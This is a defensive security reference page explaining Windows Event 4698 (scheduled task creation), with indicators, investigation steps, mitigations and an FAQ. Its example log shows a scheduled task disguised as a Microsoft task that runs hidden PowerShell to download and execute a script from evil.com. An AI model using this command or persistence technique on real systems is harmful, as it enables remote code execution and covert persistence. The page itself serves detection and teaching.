Windows Event 4698 — Scheduled Task Created

WindowsEvents Windows Security Persistence / Scheduled Task Abuse

What This Means

Track Windows Event 4698 to detect malicious scheduled tasks. Attackers use scheduled tasks for persistence, privilege escalation, and lateral movement in compromised environments.

Example Log

A scheduled task was created.

Subject:
  Security ID:    S-1-5-21-3398...-1103
  Account Name:   jsmith
  Account Domain: CONTOSO
  Logon ID:       0x1A2B3C

Task Information:
  Task Name:      \Microsoft\Windows\SystemUpdate
  Task Content:   <?xml version="1.0"?>
  <Task><Actions><Exec>
    <Command>powershell.exe</Command>
    <Arguments>-ep bypass -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://evil.com/payload.ps1')</Arguments>
  </Exec></Actions></Task>

Indicators of Suspicious Activity

Scheduled tasks executing PowerShell with encoded commands or bypass flags
Task names mimicking legitimate Windows tasks in the Microsoft\Windows namespace
Tasks configured to run as SYSTEM or another privileged account
Tasks pointing to executables in user-writable directories (Temp, AppData)
Tasks created by accounts that are not system administrators
Task actions downloading content from external URLs

How to Investigate

Review the full Task Content XML to understand what the task executes
Identify who created the task (Subject) and verify authorization
Check the RunAs account configured for the task (SYSTEM, Network Service, specific user)
Scan the command and arguments for obfuscation, encoded content, or download URLs
Verify the task trigger schedule — tasks set for off-hours or at boot are common for persistence
Correlate with Event 4688 to see if the task has already executed

Recommended Mitigations

Restrict Task Scheduler permissions to authorized admin accounts
Monitor Event 4698 and alert on any task creation outside of change management
Block PowerShell execution from scheduled tasks where not required
Audit existing scheduled tasks regularly for unauthorized or suspicious entries
Use AppLocker rules to prevent task execution from non-standard paths
Implement application whitelisting to block unauthorized executables in tasks

Scan This Log Instantly

Paste a suspicious log line below and get an instant AI-powered security assessment.

0 / 2000

What is 7 + 8?

Need a Full Investigation?

Scan entire log files, detect attack patterns, reconstruct timelines, and generate a full investigation report.

Run Smart Scan

Related Attack Patterns

Frequently Asked Questions

Why do attackers create scheduled tasks? ▼

Scheduled tasks provide persistence — the malicious code runs automatically even after reboots. They can also be used for privilege escalation by configuring the task to run as SYSTEM, and for lateral movement by creating tasks on remote systems.

How can I audit all existing scheduled tasks? ▼

Use PowerShell: Get-ScheduledTask | Where-Object {$_.State -ne 'Disabled'} | Select TaskName, TaskPath, Actions. Focus on tasks running PowerShell, cmd.exe, or executables in non-standard paths.

What is the difference between Event 4698 and 4702? ▼

Event 4698 logs task creation, while Event 4702 logs task updates. Both should be monitored, but 4698 is more critical as it represents new persistence being established.